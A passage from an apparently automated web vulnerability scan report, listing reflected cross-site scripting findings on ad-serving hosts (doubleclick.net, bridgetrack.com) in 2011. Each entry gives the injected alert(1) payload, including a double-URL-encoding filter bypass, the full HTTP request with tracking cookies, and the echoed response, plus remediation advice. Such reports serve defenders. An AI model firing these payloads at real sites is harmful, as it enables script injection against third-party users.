<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3b02/7/aa/%2a/m%3B240603520%3B0-0%3B0%3B63480535%3B3454-728/90%3B41067063/41084850/2%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=1156117ebc9"-alert(1)-"fe7d4fbae1a&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.restaurantfavorites.com/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
v
...[SNIP]...

2.27. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbb42"-alert(1)-"ab8fffa114e was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07fbb42"-alert(1)-"ab8fffa114e&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:37:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5946

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3B0%3B63480535%3B3454-728/90%3B41067063/41084850/2%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07fbb42"-alert(1)-"ab8fffa114e&redirect=http://www.restaurantfavorites.com/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "always";

var openWindow = "fals
...[SNIP]...

2.28. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e10b"-alert(1)-"059a3aecd25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=&3e10b"-alert(1)-"059a3aecd25=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:37:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5958

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
535%3B3454-728/90%3B41067063/41084850/2%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=&3e10b"-alert(1)-"059a3aecd25=1http://www.restaurantfavorites.com/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "always";

var openWindow = "false";
var
...[SNIP]...

2.29. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b67a"-alert(1)-"f51039e8e90 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=7b67a"-alert(1)-"f51039e8e90 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:37:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5946

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0535%3B3454-728/90%3B41067063/41084850/2%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=7b67a"-alert(1)-"f51039e8e90http://www.restaurantfavorites.com/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "always";

var openWindow = "false";
var w
...[SNIP]...

2.30. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f05be"-alert(1)-"3b8c2aa8f2c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629f05be"-alert(1)-"3b8c2aa8f2c&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:36:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5946

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3b02/7/aa/%2a/m%3B240603520%3B0-0%3B0%3B63480535%3B3454-728/90%3B41067063/41084850/2%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=65285831887867629f05be"-alert(1)-"3b8c2aa8f2c&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.restaurantfavorites.com/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
va
...[SNIP]...

2.31. http://ad.doubleclick.net/adj/N2883.6441.USATODAY.COM/B5327539.11 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2883.6441.USATODAY.COM/B5327539.11

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1665'-alert(1)-'43ef9d0e469 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2883.6441.USATODAY.COM/B5327539.11;sz=a1665'-alert(1)-'43ef9d0e469 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/stormcenter/default.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 36418
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:37:08 GMT
Expires: Mon, 09 May 2011 15:37:08 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
g=1;v=1;pid=62098467;aid=240223213;ko=0;cid=41821555;rid=41839342;rv=2;rn=2512943;";
this.swfParams = 'ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&src=1762894&rv=2&rid=41839342&=a1665'-alert(1)-'43ef9d0e469&';
this.renderingId = "41839342";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

2.32. http://ads.bridgetrack.com/a/f/ [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79b20%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eab3afffadfe was submitted in the click parameter. This input was echoed as 79b20"><script>alert(1)</script>ab3afffadfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the click request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /a/f/?BT_CON=200&BT_PID=1559799&r=1748565961&click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA%26num%3D1%26sig%3DAGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ%26client%3Dca-pub-8560941387472259%26adurl%3D79b20%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eab3afffadfe HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=8504762554&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456815&bpp=48&shv=r20110427&jsv=r20110427&correlator=1304955456958&frm=0&adk=3853240141&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=2&dtd=163&xpc=iqVH5Fr9Rv&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 15:37:47 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ASB164=TX=1304955468&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=15FE115810EC4523BC5C719BDE80E40F&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=592093&Cr=70719&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ATV164=62547d163AJSc68c268c1FJ7Nc38c1CFc251VcI26Tcc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: BTASES=SID=7186BD565AE2492385F1A401103DFFD5; path=/
Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 15:37:47 GMT
Connection: close
Content-Length: 4145

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...
YXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA&num=1&sig=AGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ&client=ca-pub-8560941387472259&adurl=79b20"><script>alert(1)</script>ab3afffadfehttp%3A%2F%2Fads%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D316726%26BT%5FSID%3D98461%26" target="_blank">
...[SNIP]...

2.33. http://ads.bridgetrack.com/a/f/ [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb598"%3balert(1)//c0e3dd2568c was submitted in the click parameter. This input was echoed as cb598";alert(1)//c0e3dd2568c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/f/?BT_CON=200&BT_PID=1559799&r=1748565961&click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA%26num%3D1%26sig%3DAGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ%26client%3Dca-pub-8560941387472259%26adurl%3Dcb598"%3balert(1)//c0e3dd2568c HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=8504762554&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456815&bpp=48&shv=r20110427&jsv=r20110427&correlator=1304955456958&frm=0&adk=3853240141&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=2&dtd=163&xpc=iqVH5Fr9Rv&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 15:37:48 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ASB164=TX=1304955468&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=CD678184DD024D26B47E5B1FC3D62359&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=592093&Cr=70719&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ATV164=62547d163AJSc68c268c1FJ7Nc38c1CFc251VcI26Tcc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: BTASES=SID=F4E325FEC9FF4A6BAEE218756F8E1A14; path=/
Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 15:37:47 GMT
Connection: close
Content-Length: 4094

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...
